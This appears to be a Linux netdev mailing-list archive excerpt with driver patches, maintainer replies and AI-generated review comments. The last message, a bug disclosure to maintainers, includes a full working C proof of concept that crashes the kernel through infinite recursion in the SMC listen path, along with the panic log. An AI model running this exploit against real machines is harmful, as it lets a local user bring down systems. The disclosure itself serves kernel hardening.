+ * clones the xsk buffer into a fresh MEM_TYPE_PAGE_ORDER0
+ * page that is not DMA mapped. Such a frame must be mapped
+ * via the NDO path; only a page pool-backed frame already
+ * carries a usable page_pool DMA address.
+ */
+ tx_buff_type = xdpf->mem_type == MEM_TYPE_PAGE_POOL ?
+ PRUETH_TX_BUFF_TYPE_XDP_TX :
+ PRUETH_TX_BUFF_TYPE_XDP_NDO;
+
q_idx = cpu % emac->tx_ch_num;
netif_txq = netdev_get_tx_queue(ndev, q_idx);
__netif_tx_lock(netif_txq, cpu);
result = emac_xmit_xdp_frame(emac, xdpf, q_idx,
- PRUETH_TX_BUFF_TYPE_XDP_TX);
+ tx_buff_type);
__netif_tx_unlock(netif_txq);
if (result == ICSSG_XDP_CONSUMED) {
ndev->stats.tx_dropped++;
@@ -1395,6 +1408,7 @@ void prueth_tx_cleanup(void *data, dma_addr_t desc_dma)
dev_kfree_skb_any(skb);
break;
case PRUETH_SWDATA_XDPF:
+ case PRUETH_SWDATA_XDPF_TX:
xdpf = swdata->data.xdpf;
xdp_return_frame(xdpf);
break;
diff --git a/drivers/net/ethernet/ti/icssg/icssg_prueth.h b/drivers/net/ethernet/ti/icssg/icssg_prueth.h
index df93d15c5b78..00bb760d68a9 100644
--- a/drivers/net/ethernet/ti/icssg/icssg_prueth.h
+++ b/drivers/net/ethernet/ti/icssg/icssg_prueth.h
@@ -153,6 +153,7 @@ enum prueth_swdata_type {
PRUETH_SWDATA_CMD,
PRUETH_SWDATA_XDPF,
PRUETH_SWDATA_XSK,
+ PRUETH_SWDATA_XDPF_TX,
};
enum prueth_tx_buff_type {
--
2.53.0
^ permalink raw reply related
* Re: [PATCH v2 2/2] net: fman: use devm_kzalloc() for fman and rely on devres
From: Andrew Lunn @ 2026-06-23 11:22 UTC (permalink / raw)
To: 赵金明
Cc: horms, andrew+netdev, davem, edumazet, kuba, linux-kernel,
madalin.bucur, netdev, pabeni, sean.anderson
In-Reply-To: <823580887DE24145+2026062314162397367012@uniontech.com>
On Tue, Jun 23, 2026 at 02:16:25PM +0800, 赵金明 wrote:
> Hi Andrew,
>
> Thank you for pointing me to the netdev maintainer documentation. I have
> read section 1.7.4 and I understand the concern about standalone
> cleanup conversions.
>
> I would like to clarify the actual motivation behind the
> devm_kzalloc() change. While it may appear to be a simple devm_
> conversion on the surface, it is in fact fixing a use-after-free race
> condition in the IRQF_SHARED error paths. Let me explain the problem
> in detail.
Please make the commit message explain what the fix is, rather then
saying converting to devm_.
But i also hope you also see why we don't like devm_ conversions,
because developers get them wrong like this. And all too often, they
do the conversion without actual hardware to test it with. So it
results in more bugs, not less.
Andrew
^ permalink raw reply
* s2io: driver still in use - please reconsider removal
From: Michael Pratte @ 2026-06-23 11:21 UTC (permalink / raw)
To: Jakub Kicinski, Paolo Abeni
Cc: Eric Dumazet, Ethan Nelson-Moore, Andrew Lunn, Simon Horman,
David S . Miller, netdev
Hi,
Commit aba0138eb7d7 ("net: ethernet: neterion: s2io: remove unused
driver") removed s2io in v7.0 as "highly unlikely to still be used."
It is still in use here: an Exar Xframe-II (PCI 17d5:5832) in a
Supermicro X5DA8.
Bringing it up, I found that no TCP can be transmitted on these
adapters since v4.2. I bisected it to 51466a7545b7 ("tcp: fill
shinfo->gso_type at last moment"): since that commit tcp_transmit_skb()
sets skb_shinfo(skb)->gso_type unconditionally, non-GSO TCP frames now
reach s2io_xmit() with gso_type=SKB_GSO_TCPV4 but gso_size=0. The driver
arms the hardware LSO engine off gso_type alone and programs MSS=0,
which the Xframe-II rejects (LSO6_ABORT), dropping every TCP frame
before the MAC. UDP and ICMP are unaffected.
The fix is one line - only arm LSO for skbs that are really GSO:
- if (offload_type & (SKB_GSO_TCPV4 | SKB_GSO_TCPV6)) {
+ if ((offload_type & (SKB_GSO_TCPV4 | SKB_GSO_TCPV6)) && skb_is_gso(skb)) {
I have submitted that patch to stable@ for the 6.6.y and 6.12.y trees
that still carry the driver. Given it is evidently still in use, would
you consider reverting the removal?
Thanks,
Michael Pratte
^ permalink raw reply
* [PATCH bpf-next v2] bpf, unix: Guard sk_msg-dependent code behind CONFIG_NET_SOCK_MSG
From: Jakub Sitnicki @ 2026-06-23 11:20 UTC (permalink / raw)
To: bpf
Cc: Alexei Starovoitov, Daniel Borkmann, Jakub Kicinski, Jiayuan Chen,
John Fastabend, Kuniyuki Iwashima, netdev, kernel-team
Prepare to decouple BPF_SYSCALL config option from NET_SOCK_MSG. When
completed all code paths related to sockmap-based redirects should be
guarded by BPF_SYSCALL && NET_SOCK_MSG to allow users to opt out by
disabling NET_SOCK_MSG. The implementation of sockmap as a container for
socket references would remain under BPF_SYSCALL.
Signed-off-by: Jakub Sitnicki <jakub@cloudflare.com>
---
Changes in v2:
- Handle prot->recvmsg being NULL (Sashiko)
- Elaborate on the end goal in description
- Link to v1: https://patch.msgid.link/20260622-bpf-sk_msg-split-unix-v1-1-d7e0cb7bb03b@cloudflare.com
---
net/unix/af_unix.c | 4 ++--
net/unix/unix_bpf.c | 6 ++++++
2 files changed, 8 insertions(+), 2 deletions(-)
diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
index f7a9d55eee8a..84c11c60c75f 100644
--- a/net/unix/af_unix.c
+++ b/net/unix/af_unix.c
@@ -2675,7 +2675,7 @@ static int unix_dgram_recvmsg(struct socket *sock, struct msghdr *msg, size_t si
#ifdef CONFIG_BPF_SYSCALL
const struct proto *prot = READ_ONCE(sk->sk_prot);
- if (prot != &unix_dgram_proto)
+ if (prot->recvmsg)
return prot->recvmsg(sk, msg, size, flags);
#endif
return __unix_dgram_recvmsg(sk, msg, size, flags);
@@ -3152,7 +3152,7 @@ static int unix_stream_recvmsg(struct socket *sock, struct msghdr *msg,
struct sock *sk = sock->sk;
const struct proto *prot = READ_ONCE(sk->sk_prot);
- if (prot != &unix_stream_proto)
+ if (prot->recvmsg)
return prot->recvmsg(sk, msg, size, flags);
#endif
return unix_stream_read_generic(&state, true);
diff --git a/net/unix/unix_bpf.c b/net/unix/unix_bpf.c
index f86ff19e9764..5289a04b4993 100644
--- a/net/unix/unix_bpf.c
+++ b/net/unix/unix_bpf.c
@@ -7,6 +7,7 @@
#include "af_unix.h"
+#ifdef CONFIG_NET_SOCK_MSG
#define unix_sk_has_data(__sk, __psock) \
({ !skb_queue_empty(&__sk->sk_receive_queue) || \
!skb_queue_empty(&__psock->ingress_skb) || \
@@ -94,6 +95,7 @@ static int unix_bpf_recvmsg(struct sock *sk, struct msghdr *msg,
sk_psock_put(sk, psock);
return copied;
}
+#endif /* CONFIG_NET_SOCK_MSG */
static struct proto *unix_dgram_prot_saved __read_mostly;
static DEFINE_SPINLOCK(unix_dgram_prot_lock);
@@ -107,8 +109,10 @@ static void unix_dgram_bpf_rebuild_protos(struct proto *prot, const struct proto
{
*prot = *base;
prot->close = sock_map_close;
+#ifdef CONFIG_NET_SOCK_MSG
prot->recvmsg = unix_bpf_recvmsg;
prot->sock_is_readable = sk_msg_is_readable;
+#endif
}
static void unix_stream_bpf_rebuild_protos(struct proto *prot,
@@ -116,8 +120,10 @@ static void unix_stream_bpf_rebuild_protos(struct proto *prot,
{
*prot = *base;
prot->close = sock_map_close;
+#ifdef CONFIG_NET_SOCK_MSG
prot->recvmsg = unix_bpf_recvmsg;
prot->sock_is_readable = sk_msg_is_readable;
+#endif
prot->unhash = sock_map_unhash;
}
^ permalink raw reply related
* Re: [PATCH] MAINTAINERS: Orphan SUNPLUS ETHERNET DRIVER
From: Andrew Lunn @ 2026-06-23 11:15 UTC (permalink / raw)
To: Wells Lu
Cc: Jakub Kicinski, netdev, linux-kernel, Shitalkumar Gandhi,
David S . Miller, Eric Dumazet, Paolo Abeni, Simon Horman,
Shitalkumar Gandhi
In-Reply-To: <20260622180721.28334-1-wellslutw@gmail.com>
On Tue, Jun 23, 2026 at 02:07:21AM +0800, Wells Lu wrote:
> I have left Sunplus and no longer have access to the relevant hardware
> to test or maintain this driver. Mark the driver as orphaned.
>
> Signed-off-by: Wells Lu <wellslutw@gmail.com>
Reviewed-by: Andrew Lunn <andrew@lunn.ch>
Andrew
^ permalink raw reply
* Re: [PATCH iwl-net] ice: clear the default forwarding VSI rule when releasing a VSI
From: Petr Oros @ 2026-06-23 10:57 UTC (permalink / raw)
To: Simon Horman
Cc: netdev, anthony.l.nguyen, przemyslaw.kitszel, andrew+netdev,
davem, edumazet, kuba, pabeni, jacob.e.keller, michal.swiatkowski,
intel-wired-lan, linux-kernel
In-Reply-To: <20260623102934.1072800-1-horms@kernel.org>
On 6/23/26 12:29, Simon Horman wrote:
> This is an AI-generated review of your patch. The human sending this
> email has considered the AI review valid, or at least plausible.
> Full review at: https://sashiko.dev
> ---
> ice: clear the default forwarding VSI rule when releasing a VSI
>
> This patch restores the cleanup of the default forwarding VSI rule
> in ice_vsi_release(), clearing it when the VSI owns it. This prevents
> a rule leak if a trusted VF enters promiscuous mode and is then destroyed.
>
>> diff --git a/drivers/net/ethernet/intel/ice/ice_lib.c b/drivers/net/ethernet/intel/ice/ice_lib.c
>> --- a/drivers/net/ethernet/intel/ice/ice_lib.c
>> +++ b/drivers/net/ethernet/intel/ice/ice_lib.c
>> @@ -2871,6 +2871,9 @@ int ice_vsi_release(struct ice_vsi *vsi)
>> return -ENODEV;
>> pf = vsi->back;
>>
>> + if (ice_is_vsi_dflt_vsi(vsi))
>> + ice_clear_dflt_vsi(vsi);
>> +
> [Severity: High]
> Is there a time-of-check to time-of-use race here?
>
> ice_is_vsi_dflt_vsi() acquires and releases the filt_rule_lock to check if
> the current VSI is the default. If true, ice_clear_dflt_vsi() is called,
> which acquires the lock again during rule removal.
>
> If the lock is dropped between these two calls, could another thread
> establish a new default VSI rule before ice_clear_dflt_vsi() runs?
>
> When ice_clear_dflt_vsi() executes, it appears the rule search only matches
> by l_data and flag:
>
> ice_switch.c:ice_find_rule_entry() {
> if (!memcmp(&f_info->l_data, &list_itr->fltr_info.l_data,
> sizeof(f_info->l_data)) &&
> f_info->flag == list_itr->fltr_info.flag) {
> ...
> }
>
> For the default VSI rule, l_data is empty, so it might match any newly
> established default rule.
>
> And since ice_remove_rule_internal() does not appear to validate the
> vsi_handle for non-list rules:
>
> ice_switch.c:ice_remove_rule_internal() {
> if (list_elem->fltr_info.fltr_act != ICE_FWD_TO_VSI_LIST) {
> remove_rule = true;
> ...
> }
>
> Could this blindly remove the default forwarding configuration for a
> completely unrelated VSI?
The dropped lock isn't new here. The whole dflt_vsi API is check-then-act.
ice_vsi_sync_fltr() does the same if (ice_is_vsi_dflt_vsi(vsi))
ice_clear_dflt_vsi(vsi), and this path runs under vf->cfg_lock, the same
domain as the ice_vf_clear_all_promisc_modes() cleanup it restores. There
is at most one DFLT rule per direction, because a second default VSI folds
both into one ICE_FWD_TO_VSI_LIST, which is the leak this fixes, so the
empty l_data match is unambiguous. In that list case removal honors the
handle via ice_rem_update_vsi_list() and drops only the requested VSI. The
unvalidated whole rule branch is only the single VSI case where that
VSI is
the sole default, so removing it is intended. An unrelated removal would
require another context to clear this VSI and install a different sole
default in the gap, but those flows are serialized per context with rtnl,
vf->cfg_lock and ICE_CFG_BUSY.
Regards,
Petr
>> if (test_bit(ICE_FLAG_RSS_ENA, pf->flags))
>> ice_rss_clean(vsi);
^ permalink raw reply
* Re: [PATCH net v2] net: airoha: Add retry mechanism to airoha_qdma_set_trtcm_param()
From: Simon Horman @ 2026-06-23 10:53 UTC (permalink / raw)
To: lorenzo
Cc: Simon Horman, andrew+netdev, davem, edumazet, kuba, pabeni,
leto.liu, linux-arm-kernel, linux-mediatek, netdev, brown.huang
In-Reply-To: <20260622-airoha_qdma_set_trtcm_param-retry-fix-v2-1-95a83ac99dbd@kernel.org>
This is an AI-generated review of your patch. The human sending this
email has considered the AI review valid, or at least plausible.
Full review at: https://sashiko.dev
Simon says: I'd appreciate it if you could look over the first two issues
flagged below in the context of this patch. While the third
and final issue looks like it is in possible separate follow-up
territory.
---
net: airoha: Add retry mechanism to airoha_qdma_set_trtcm_param()
This patch introduces a retry loop to airoha_qdma_set_trtcm_param() to mitigate
bus timeouts when configuring QDMA parameters. It attempts to verify that the
configuration is correctly applied to the hardware.
> diff --git a/drivers/net/ethernet/airoha/airoha_eth.c b/drivers/net/ethernet/airoha/airoha_eth.c
> index 3370c3df7c107..bb5c0599a4eed 100644
> --- a/drivers/net/ethernet/airoha/airoha_eth.c
> +++ b/drivers/net/ethernet/airoha/airoha_eth.c
> @@ -2673,14 +2673,30 @@ static int airoha_qdma_set_trtcm_param(struct airoha_qdma *qdma, int channel,
> FIELD_PREP(TRTCM_METER_GROUP_MASK, group) |
> FIELD_PREP(TRTCM_PARAM_INDEX_MASK, idx) |
> FIELD_PREP(TRTCM_PARAM_RATE_TYPE_MASK, mode);
> + int i;
>
> - airoha_qdma_wr(qdma, REG_TRTCM_DATA_LOW(addr), val);
> - airoha_qdma_wr(qdma, REG_TRTCM_CFG_PARAM(addr), config);
> + for (i = 0; i < 100; i++) {
> + u32 data;
>
> - return read_poll_timeout(airoha_qdma_rr, val,
> - val & TRTCM_PARAM_RW_DONE_MASK,
> - USEC_PER_MSEC, 10 * USEC_PER_MSEC, true,
> - qdma, REG_TRTCM_CFG_PARAM(addr));
> + airoha_qdma_wr(qdma, REG_TRTCM_DATA_LOW(addr), val);
> + wmb();
> + airoha_qdma_wr(qdma, REG_TRTCM_CFG_PARAM(addr), config);
> +
> + if (read_poll_timeout(airoha_qdma_rr, data,
> + data & TRTCM_PARAM_RW_DONE_MASK,
> + USEC_PER_MSEC, 10 * USEC_PER_MSEC,
> + true, qdma, REG_TRTCM_CFG_PARAM(addr)))
> + return -ETIMEDOUT;
[Severity: High]
If a bus timeout causes the write phase's read_poll_timeout() in
airoha_qdma_set_trtcm_param() to fail, this immediately returns -ETIMEDOUT,
aborting the 100-iteration retry loop.
Doesn't this defeat the mitigation?
> +
> + if (airoha_qdma_get_trtcm_param(qdma, channel, addr, param,
> + mode, &data, NULL))
> + continue;
[Severity: High]
If airoha_qdma_get_trtcm_param() times out during the verification phase, it
indicates the hardware hasn't finished the read command (DONE bit is still 0).
The continue statement then immediately starts the next iteration, writing new
commands to DATA_LOW and CFG_PARAM.
Can writing to command registers while the hardware state machine is actively
busy violate hardware protocols and lead to unrecoverable lockups?
> +
> + if (data == val)
> + return 0;
[Severity: High]
This isn't a bug introduced by this patch, but if the bus drops the command
write to REG_TRTCM_CFG_PARAM, the hardware never executes the command and the
TRTCM_PARAM_RW_DONE_MASK bit remains set from the previous operation.
Consequently, read_poll_timeout() returns an immediate false success.
If both the set and get command writes are dropped by the bus, the get
operation will read back the newly written DATA_LOW register value.
Will the data == val check evaluate to true and falsely report success without
the hardware ever processing the configuration?
> + }
> +
> + return -EBUSY;
> }
>
[ ... ]
> static int airoha_qdma_set_trtcm_config(struct airoha_qdma *qdma, int channel,
> u32 addr, enum trtcm_mode_type mode,
> bool enable, u32 enable_mask)
> {
> u32 val;
>
> if (airoha_qdma_get_trtcm_param(qdma, channel, addr, TRTCM_MISC_MODE,
> mode, &val, NULL))
> return -EINVAL;
[Severity: High]
Standalone calls to airoha_qdma_get_trtcm_param(), like this one in
airoha_qdma_set_trtcm_config(), lack a retry loop entirely.
Does this leave read-modify-write cycles fully vulnerable to the same bus
timeouts the patch attempts to mitigate?
[Severity: High]
This isn't a bug introduced by this patch, but the patch mitigates bus
timeouts in airoha_qdma_set_trtcm_param() while entirely missing
airoha_qdma_set_rl_param().
The latter performs the exact same write-and-poll sequence on identical QDMA
configuration registers:
drivers/net/ethernet/airoha/airoha_eth.c:airoha_qdma_set_rl_param() {
...
return read_poll_timeout(..., val & RATE_LIMIT_PARAM_RW_DONE_MASK, ...);
}
If bus timeouts affect QDMA access broadly as stated in the commit message, are
the rate-limiting configuration paths randomly vulnerable to the same failures?
[Severity: High]
This isn't a bug introduced by this patch, but in airoha_tc_remove_htb_queue(),
hardware teardown incorrectly uses queue + 1 instead of queue:
drivers/net/ethernet/airoha/airoha_eth.c:airoha_tc_remove_htb_queue() {
...
airoha_qdma_set_tx_rate_limit(netdev, queue + 1, 0, 0);
...
}
Does this leave the removed queue's hardware limits permanently active
(resource leak) and inadvertently disable the rate limits for queue + 1,
corrupting the QoS state of another active channel?
^ permalink raw reply
* Re: [PATCH net V3 1/3] net/mlx5e: Fix HV VHCA stats zero-sized buffer allocation
From: Simon Horman @ 2026-06-23 10:46 UTC (permalink / raw)
To: tariqt
Cc: Simon Horman, andrew+netdev, davem, edumazet, kuba, netdev,
pabeni, cratiu, eranbe, feliu, haiyangz, lkayal, leon,
linux-kernel, linux-rdma, mbloch, noren, saeedm, gal, alazar,
cjubran, kees, eranbe, saeedm
In-Reply-To: <20260622083646.593220-2-tariqt@nvidia.com>
This is an AI-generated review of your patch. The human sending this
email has considered the AI review valid, or at least plausible.
Full review at: https://sashiko.dev
Simon says: I think this issue can be addressed by reversing the order
that patches 1/3 and 2/3 appear in this patch-set.
---
net/mlx5e: Fix HV VHCA stats zero-sized buffer allocation
This commit fixes a zero-sized buffer allocation by using max_nch instead of
stats_nch when allocating the buffer for HV VHCA stats.
> diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/hv_vhca_stats.c b/drivers/net/ethernet/mellanox/mlx5/core/en/hv_vhca_stats.c
> index 195863b2c013e..06cbd49d4e98e 100644
> --- a/drivers/net/ethernet/mellanox/mlx5/core/en/hv_vhca_stats.c
> +++ b/drivers/net/ethernet/mellanox/mlx5/core/en/hv_vhca_stats.c
> @@ -122,7 +128,7 @@ static void mlx5e_hv_vhca_stats_cleanup(struct mlx5_hv_vhca_agent *agent)
>
> void mlx5e_hv_vhca_stats_create(struct mlx5e_priv *priv)
> {
> - int buf_len = mlx5e_hv_vhca_stats_buf_size(priv);
> + int buf_len = mlx5e_hv_vhca_stats_buf_max_size(priv);
> struct mlx5_hv_vhca_agent *agent;
>
> priv->stats_agent.buf = kvzalloc(buf_len, GFP_KERNEL);
[Severity: High]
Does this change introduce a potential double-free regression on memory
allocation failure?
When mlx5e_hv_vhca_stats_destroy() cleans up the stats agent, it frees the
agent but does not set priv->stats_agent.agent to NULL.
Before this patch, kvzalloc() was called with 0 and returned ZERO_SIZE_PTR,
so it never returned NULL. It always proceeded to call
mlx5_hv_vhca_agent_create() which overwrote priv->stats_agent.agent.
Now that the buffer size is non-zero, if kvzalloc() fails it will return
NULL and take the early return path in mlx5e_hv_vhca_stats_create():
priv->stats_agent.buf = kvzalloc(buf_len, GFP_KERNEL);
if (!priv->stats_agent.buf)
return;
This early return bypasses overwriting the dangling priv->stats_agent.agent.
If a subsequent device detach occurs, mlx5e_hv_vhca_stats_destroy() could
dereference and free this stale pointer again.
I noticed this was later addressed upstream in commit e600849cc1e0
("net/mlx5e: Fix HV VHCA stats agent registration race").
^ permalink raw reply
* Re: [PATCH] rocker: Fix memory leak in ofdpa_port_fdb()
From: Jiri Pirko @ 2026-06-23 10:39 UTC (permalink / raw)
To: Jakub Kicinski
Cc: Andrew Lunn, Jacob Keller, Ziran Zhang, Andrew Lunn,
David S . Miller, Eric Dumazet, Paolo Abeni, netdev, linux-kernel
In-Reply-To: <20260617164411.2a8a260e@kernel.org>
Thu, Jun 18, 2026 at 01:44:11AM +0200, kuba@kernel.org wrote:
>On Wed, 17 Jun 2026 11:26:46 +0200 Andrew Lunn wrote:
>> On Tue, Jun 16, 2026 at 04:29:59PM -0700, Jacob Keller wrote:
>> > On 6/15/2026 6:32 PM, Ziran Zhang wrote:
>> > > In ofdpa_port_fdb(), the hash_del() only unlinks the node from
>> > > hash table, but does not free it.
>> > >
>> > > Fix this by adding kfree(found) after the !found == removing check,
>> > > where the pointer value is no longer needed.
>> > >
>> > > Found by Coccinelle kfree script.
>>
>> Is rocker actually used any more? I'm not too sure of the history, but
>> was it not added as a way to develop the early switchdev code? There
>> was a qemu implementation of the 'hardware'?
>>
>> Is it still useful? Should we actually just remove the driver?
>
>I think it came up before but I don't remember the conclusion :S
>We should either add rocker to NIPA or delete it. Jiri, WDYT?
Remove.
^ permalink raw reply
* RE: [Intel-wired-lan] [PATCH net v2] igb: only strip Rx timestamp header on the first buffer of a frame
From: Tjerk Kusters @ 2026-06-23 10:38 UTC (permalink / raw)
To: Kwapulinski, Piotr, Nguyen, Anthony L, Kitszel, Przemyslaw,
Andrew Lunn, David S. Miller, Eric Dumazet, Jakub Kicinski,
Paolo Abeni, Richard Cochran, Jesper Dangaard Brouer,
Kurt Kanzenbach
Cc: intel-wired-lan@lists.osuosl.org, netdev@vger.kernel.org,
linux-kernel@vger.kernel.org, stable@vger.kernel.org
In-Reply-To: <BL1PR11MB59792FC9956781218FC85B66F3EE2@BL1PR11MB5979.namprd11.prod.outlook.com>
Hi,
> >
> > /* pull rx packet timestamp if available and valid */
> Is this comment up-to-date now ?
> Reviewed-by: Piotr Kwapulinski <piotr.kwapulinski@intel.com>
>
Good point, the comment doesn't fully match the code anymore. I'll update it in v3 to:
/* pull rx packet timestamp if available and valid; it is only
* present on the first buffer of a frame
*/
Thanks for the review.
Tjerk
^ permalink raw reply
* Re: [PATCH net v2] net/smc: avoid recursive sk_callback_lock in listen data_ready
From: XIAO WU @ 2026-06-23 10:38 UTC (permalink / raw)
To: Runyu Xiao, D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang,
David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul,
linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu, stable
In-Reply-To: <20260619054815.176764-1-runyu.xiao@seu.edu.cn>
Hi Runyu,
Thanks for this patch.
> diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
> index 6421c2e1c84d..1af4e3c333ff 100644
> --- a/net/smc/af_smc.c
> +++ b/net/smc/af_smc.c
> @@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock
*listen_clcsock)
> {
> struct smc_sock *lsmc;
>
> + if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)
> + return;
> +
> read_lock_bh(&listen_clcsock->sk_callback_lock);
> lsmc = smc_clcsock_user_data(listen_clcsock);
The TCP_LISTEN check before taking sk_callback_lock looks correct and
mirrors the same pattern from nvmet TCP.
Sashiko AI review also looked at this patch and flagged a separate
pre-existing issue nearby — the error path in smc_listen() does not
restore icsk_af_ops when kernel_listen() fails:
https://sashiko.dev/#/patchset/20260617152855.1039151-1-runyu.xiao@seu.edu.cn
The relevant code in smc_listen() (net/smc/af_smc.c, lines ~2687-2704):
smc->ori_af_ops = inet_csk(smc->clcsock->sk)->icsk_af_ops;
smc->af_ops = *smc->ori_af_ops;
smc->af_ops.syn_recv_sock = smc_tcp_syn_recv_sock;
inet_csk(smc->clcsock->sk)->icsk_af_ops = &smc->af_ops;
if (smc->limit_smc_hs)
tcp_sk(smc->clcsock->sk)->smc_hs_congested =
smc_hs_congested;
rc = kernel_listen(smc->clcsock, backlog);
if (rc) {
write_lock_bh(&smc->clcsock->sk->sk_callback_lock);
smc_clcsock_restore_cb(&smc->clcsock->sk->sk_data_ready,
&smc->clcsk_data_ready);
rcu_assign_sk_user_data(smc->clcsock->sk, NULL);
write_unlock_bh(&smc->clcsock->sk->sk_callback_lock);
goto out;
}
The error path restores sk_data_ready and sk_user_data but leaves
icsk_af_ops pointing to &smc->af_ops (whose syn_recv_sock is already
set to smc_tcp_syn_recv_sock). I verified this in a QEMU VM and can
confirm it triggers a real kernel stack overflow.
=== Reproduction ===
Kernel: 7.1.0-rc7-gfa471042f07a #1 SMP PREEMPT_DYNAMIC x86_64
Config: ci-qemu-upstream.config (KASAN=y, CONFIG_SMC=y, DEBUG_LIST=y)
QEMU: qemu-system-x86_64 -m 2G -smp 2
Trigger sequence:
1. SMC socket A: setsockopt(SO_REUSEADDR), bind to port P
→ clcsock gets SO_REUSEADDR via smc_bind() copy
2. TCP socket C: setsockopt(SO_REUSEADDR), bind + listen on port P
→ Both non-TCP_LISTEN at bind time → bind OK
→ C enters TCP_LISTEN after its listen()
3. listen(A) on SMC → kernel_listen() fails with EADDRINUSE
→ icsk_af_ops NOT restored → clcsock points to wrapper
4. Close TCP C (free port), listen(A) again → succeeds
→ ori_af_ops now points to wrapper with syn_recv_sock =
smc_tcp_syn_recv_sock
5. TCP connect() to port P → smc_tcp_syn_recv_sock calls itself
→ infinite recursion → IRQ stack guard page hit → kernel panic
=== Full PoC ===
Compile with: gcc -o poc poc.c -static
// PoC: Stack overflow via corrupted icsk_af_ops in smc_listen error path
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#ifndef PF_SMC
#define PF_SMC 43
#endif
#ifndef SMCPROTO_SMC
#define SMCPROTO_SMC 0
#endif
int main(void)
{
int smc_a, tcp_c, client;
struct sockaddr_in addr;
pid_t child;
int status, ret;
socklen_t len;
int val;
printf("=== SMC listen error path -> stack overflow PoC ===\n\n");
/* Step 1: SMC socket A with SO_REUSEADDR, bind to any free port */
printf("[1] Create SMC socket A with SO_REUSEADDR\n");
smc_a = socket(PF_SMC, SOCK_STREAM, 0);
if (smc_a < 0) { perror("smc socket"); return 1; }
val = 1;
setsockopt(smc_a, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val));
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = htonl(INADDR_ANY);
addr.sin_port = 0;
if (bind(smc_a, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
perror("bind smc_a"); close(smc_a); return 1;
}
len = sizeof(addr);
if (getsockname(smc_a, (struct sockaddr *)&addr, &len) < 0) {
perror("getsockname"); close(smc_a); return 1;
}
int port = ntohs(addr.sin_port);
printf(" SMC A bound to port %d\n", port);
/* Step 2: TCP socket C with SO_REUSEADDR, bind+listen on same port */
printf("[2] TCP C with SO_REUSEADDR, bind+listen on port %d\n", port);
tcp_c = socket(AF_INET, SOCK_STREAM, 0);
val = 1;
setsockopt(tcp_c, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val));
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = htonl(INADDR_ANY);
addr.sin_port = htons(port);
if (bind(tcp_c, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
perror("bind tcp_c"); close(tcp_c); close(smc_a); return 1;
}
if (listen(tcp_c, 5) < 0) {
perror("listen tcp_c"); close(tcp_c); close(smc_a); return 1;
}
printf(" TCP C listening on port %d\n", port);
/* Step 3: listen(A) should FAIL → icsk_af_ops NOT restored */
printf("[3] listen(SMC A) — expect failure... ");
fflush(stdout);
ret = listen(smc_a, 5);
if (ret == 0) {
printf("succeeded! Unexpected.\n");
close(tcp_c); close(smc_a);
return 1;
}
printf("failed: %s\n", strerror(errno));
/* Step 4: Close TCP C to free the port */
printf("[4] Close TCP C to free port %d\n", port);
close(tcp_c);
sleep(1);
/* Step 5: listen(A) again → succeeds but ori_af_ops is
self-referential */
printf("[5] listen(SMC A) again... ");
fflush(stdout);
ret = listen(smc_a, 5);
if (ret < 0) {
printf("failed: %s, retrying...\n", strerror(errno));
sleep(2);
ret = listen(smc_a, 5);
}
if (ret < 0) {
perror("retry"); close(smc_a); return 1;
}
printf("succeeded! ori_af_ops->syn_recv_sock ==
smc_tcp_syn_recv_sock\n");
/* Step 6: TCP connect → smc_tcp_syn_recv_sock recursion → STACK
OVERFLOW */
printf("[6] TCP connect → triggers infinite recursion...\n");
fflush(stdout);
child = fork();
if (child == 0) {
client = socket(AF_INET, SOCK_STREAM, 0);
if (client < 0) exit(1);
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
addr.sin_port = htons(port);
if (connect(client, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
perror("connect");
exit(1);
}
sleep(3);
close(client);
exit(0);
}
printf("Waiting for crash...\n");
sleep(5);
if (waitpid(child, &status, WNOHANG) == 0) {
printf("Child still alive — check dmesg\n");
kill(child, SIGKILL);
waitpid(child, NULL, 0);
}
close(smc_a);
return 0;
}
=== Crash Log ===
Linux syzkaller 7.1.0-rc7-gfa471042f07a #1 SMP PREEMPT_DYNAMIC x86_64
(CONFIG_KASAN=y, CONFIG_SMC=y, CONFIG_DEBUG_LIST=y)
[ 1453.562682][ C0] BUG: IRQ stack guard page was hit at
ffffc8ffffffff98 (stack is ffffc90000000000..ffffc90000008000)
[ 1453.562712][ C0] Oops: stack guard page: 0000 [#1] SMP KASAN NOPTI
[ 1453.562733][ C0] CPU: 0 UID: 0 PID: 10840 Comm: poc Not tainted
7.1.0-rc7-gfa471042f07a #1 PREEMPT(full)
[ 1453.562756][ C0] Hardware name: QEMU Standard PC (Q35 + ICH9,
2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 1453.562767][ C0] RIP: 0010:__lock_acquire+0x417/0x2730
[ 1453.562965][ C0] Call Trace:
[ 1453.562970][ C0] <IRQ>
[ 1453.562980][ C0] lock_acquire+0x1ae/0x360
[ 1453.562995][ C0] ? smc_tcp_syn_recv_sock+0xab/0xb10
[ 1453.563031][ C0] smc_tcp_syn_recv_sock+0xbf/0xb10
[ 1453.563051][ C0] ? smc_tcp_syn_recv_sock+0xab/0xb10
[ 1453.563073][ C0] ? __pfx_smc_tcp_syn_recv_sock+0x10/0x10
[ 1453.563114][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563158][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
